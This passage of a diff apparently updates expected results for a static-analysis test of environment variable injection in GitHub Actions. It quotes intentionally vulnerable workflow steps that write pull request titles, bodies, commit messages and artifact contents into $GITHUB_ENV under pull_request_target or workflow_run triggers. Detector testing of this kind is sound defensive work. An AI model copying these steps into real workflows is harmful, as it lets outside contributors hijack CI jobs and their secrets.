.github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,40 +129,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 